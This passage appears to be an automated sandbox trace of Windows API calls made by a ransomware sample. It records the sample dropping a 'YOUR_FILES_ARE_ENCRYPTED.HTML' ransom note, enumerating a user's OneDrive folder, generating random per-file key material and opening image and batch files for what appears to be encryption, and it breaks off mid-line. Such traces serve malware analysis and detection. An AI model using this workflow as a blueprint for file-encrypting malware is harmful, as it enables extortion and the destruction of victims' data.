pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0111.475] GetProcessHeap () returned 0x600000 [0111.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0111.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.475] WriteFile (in: hFile=0x320, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.476] CloseHandle (hObject=0x320) returned 1 [0111.477] GetProcessHeap () returned 0x600000 [0111.477] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0111.478] GetProcessHeap () returned 0x600000 [0111.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.478] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0111.478] StrStrIW (lpFirst="OneDrive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.478] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive") returned 58 [0111.478] GetProcessHeap () returned 0x600000 [0111.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.478] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive" [0111.478] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\*" [0111.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0111.478] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.478] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x883c79d5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="17.3.5892.0626", cAlternateFileName="173589~1.062")) returned 1 [0111.478] StrStrIW (lpFirst="17.3.5892.0626", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.478] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626") returned 73 [0111.478] GetProcessHeap () returned 0x600000 [0111.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.479] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626" [0111.479] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\*" [0111.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x883c79d5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.487] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x883c79d5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x973d65a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0111.487] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cd17d55, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8cd17d55, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8dfb8492, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0111.487] StrStrIW (lpFirst="AutoPlayLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.487] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png") returned 90 [0111.487] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0111.487] lstrlenW (lpString=".png") returned 4 [0111.487] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0111.487] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.487] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4668) returned 1 [0111.488] GetProcessHeap () returned 0x600000 [0111.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.496] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="33") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="69") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="BE") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D1") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="76") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="CD") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C0") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="AE") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="28") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="65") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F9") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="52") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="AC") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="52") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="78") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="41") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="07") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D9") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="AB") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D9") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="44") returned 2 [0111.496] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="8F") returned 2 [0111.496] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="41") returned 2 [0111.496] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4E") returned 2 [0111.496] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="61") returned 2 [0111.496] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="30") returned 2 [0111.496] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="78") returned 2 [0111.496] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="BB") returned 2 [0111.496] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="6C") returned 2 [0111.496] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="F3") returned 2 [0111.496] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F3") returned 2 [0111.496] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2D") returned 2 [0111.497] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayLogo.png" [0111.497] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.497] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.497] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f743688, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8f743688, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91beba26, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0111.497] StrStrIW (lpFirst="AutoPlayOptIn.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.497] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif") returned 91 [0111.497] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0111.497] lstrlenW (lpString=".gif") returned 4 [0111.497] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0111.497] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.497] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=383222) returned 1 [0111.497] GetProcessHeap () returned 0x600000 [0111.497] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.499] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="19") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CB") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B8") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="56") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="9E") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="44") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="70") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="51") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="9C") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C4") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="69") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="A0") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C7") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E1") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C8") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="38") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="65") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0B") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D5") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D0") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C8") returned 2 [0111.500] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9A") returned 2 [0111.500] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="3F") returned 2 [0111.500] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="DC") returned 2 [0111.500] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="64") returned 2 [0111.500] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0A") returned 2 [0111.500] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="06") returned 2 [0111.500] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="2C") returned 2 [0111.500] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E8") returned 2 [0111.500] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D3") returned 2 [0111.500] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="BA") returned 2 [0111.500] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2D") returned 2 [0111.501] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif" [0111.501] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.501] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922c670c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x922c670c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92849c84, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0111.517] StrStrIW (lpFirst="AutoPlayOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.517] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png") returned 91 [0111.517] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0111.517] lstrlenW (lpString=".png") returned 4 [0111.517] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0111.517] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.517] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=10226) returned 1 [0111.517] GetProcessHeap () returned 0x600000 [0111.518] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.520] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="AE") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="1F") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="08") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="87") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EF") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="2A") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="16") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="80") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="49") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="32") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="47") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="99") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="7E") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="B1") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F4") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9F") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B5") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8E") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="53") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="DD") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="5E") returned 2 [0111.520] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="2B") returned 2 [0111.520] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="35") returned 2 [0111.520] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D3") returned 2 [0111.520] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="89") returned 2 [0111.520] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C8") returned 2 [0111.521] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C4") returned 2 [0111.521] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="9D") returned 2 [0111.521] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E3") returned 2 [0111.521] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BD") returned 2 [0111.521] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="07") returned 2 [0111.521] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2B") returned 2 [0111.521] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png" [0111.521] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.521] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.526] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92ed8427, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92ed8427, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93350a85, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x16da, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0111.527] StrStrIW (lpFirst="CollectOneDriveLogs.bat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.527] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat") returned 97 [0111.527] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0111.527] lstrlenW (lpString=".bat") returned 4 [0111.527] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0111.527] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.527] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=5850) returned 1 [0111.527] GetProcessHeap () returned 0x600000 [0111.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.530] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="95") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="40") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="D5") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="BD") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="72") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: 